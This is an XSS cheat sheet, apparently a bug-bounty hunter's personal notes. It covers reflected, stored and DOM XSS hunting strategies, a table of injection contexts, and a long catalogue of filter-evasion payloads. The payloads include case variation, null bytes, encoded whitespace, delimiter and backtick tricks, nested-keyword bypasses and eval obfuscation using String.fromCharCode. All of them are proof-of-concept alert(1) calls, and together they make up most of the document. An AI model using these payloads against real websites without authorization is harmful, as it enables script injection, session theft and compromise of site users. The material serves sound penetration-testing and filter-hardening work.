XSS Cheat sheet
Active XSS hunting
Attack strategy
Types of XSS
| a | Reflected XSS- | Stored XSS | DOM XSS |
|---|---|---|---|
| Value reflection | Value is not stored in database but instead from a GET or POST parameter | Value is stored in database and gotten from there | Value gets put into DOM Sink |
| Test objectives | Identify where a value is stored into the DB and reflected back onto the page + Assess the input they accept and see if we can't pass around any filters | Identify where a value is reflected into the response + Assess the input they accept and see if we can't pass around any filters | Identify where a value is put into a DOM sink and reflected back onto the page + Assess the input they accept and see if we can't pass around any filters |
| Step 1 | Detect input vectors by testing ALL parameters | Detect input vectors by testing ALL parameters | Static code review works best for this |
| Step 2 | Analyse the results depending on the context | Analyse the results depending on the context | Find the DOM sinks by entering a random value and looking at the developer console, try to find the value where it is reflected and the context |
| Step 3 | Check impact of attack vector | Check impact of attack vector | Attacker MUST use developer console and not inspect source as that will not show DOM elements |
| Untitled |
Passive XSS hunting
Attack strategy
Enter "'`><u>Rat was here<img src=x> into every fields that you see.
- Name, last name, adress,... at registration
- Names and content of ever object you create
- EVERYWHERE
If you encounter a value that's reflected, determine context.
Contexts
| Column | JavaScript context | HTML Tag context | HTML Tag attribute context |
|---|---|---|---|
| Attack vector | '"` | <u>Rat was here + <img src=x> | "'`> |
| Breaks | Breaks javascript functions | Nothing, reflects value into HTML context without sanitise, allowing for own tags | HTML tag attribute such as "Value" for <input> tag |
| Exploit | Try to insert our own JS code | Add event handlers to tags | Insert JS event handler or JS code into tag |
| Example | '); alert(); — | <img src=x onerror=alert()> | ' alert(); ' |
Filter evasion
Techniques
| Name | Tags | Column |
|---|---|---|
| Basic modifications | <script>alert(1)</script> <script >alert(1)</script> <script >alert(1)</script> Encoded tabs/newlines/CR <script	>alert(1)</script> <script
>alert(1)</script> <script
>alert(1)</script> Capital letters <ScRipT>alert(1)</sCriPt>Adding nullbytes: <%00script>alert(1)</script> <script>al%00ert(1)</script> | Doing basic things like adding spaces, encoding tabs, newlines and carriege rerurns can do a lot alread |
| Attributes and tags | <input type="text" name="input" value="hello"> <input type="text" name="input" value="><script>alert(1)</script> <randomtag type="text" name="input" value="><script>alert(1)</script> <input/type="text" name="input" value="><script>alert(1)</script> <input	type="text" name="input" value="><script>alert(1)</script> <input
type="text" name="input" value="><script>alert(1)</script> <input
type="text" name="input" value="><script>alert(1)</script> <input/'type="text" name="input" value="><script>alert(1)</script> <iNpUt type="text" name="input" value="><script>alert(1)</script> <%00input type="text" name="input" value="><script>alert(1)</script> <inp%00ut type="text" name="input" value="><script>alert(1)</script> <input t%00ype="text" name="input" value="><script>alert(1)</script> <input type="text" name="input" value="><script>a%00lert(1)</script> | We can do the same basic modifications to attribute tags and add things like nullbytes |
| Event handlers | Use burp intruder, select your event handler that's blocked and use burp suites cheat sheet to test all event handlers | Try all different event handlers https://portswigger.net/web-security/cross-site-scripting/cheat-sheet Use burp intruder |
| Delimiters and brackers | <img onerror="alert(1)"src=x>
<img onerror='alert(1)'src=x>
URL encodign
<img onerror="alert(1)"src=x>
<img onerror='alert(1)'src=x>
Backticks
<img onerror=alert(1)src=x>
Encoded backtics
<img onerror=`alert(1)`src=x> | Sometimes we can play with things like delimiters by encoding them if they are blocked |
| Delimiters and brackers - 2 | Double use of delimiters <<script>alert(1)//<</script> Unknown delimiters «input onsubmit=alert(1)» Encoded ®input onsubmit=alert(1)¯ | |
| Eval() | <script>eval('a\u006cert(1)')</script> <script>eval('al' + 'ert(1)')</script> <script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41))</script> | We can also make use of the eval() function in JS to obfuscate some strings so they won't be filtered |
| Using filtered words in filtered words | If script is filtered <scrscriptipt> might become <script> | This helped me find many bounties 😂 |
| Use your imagination <3 |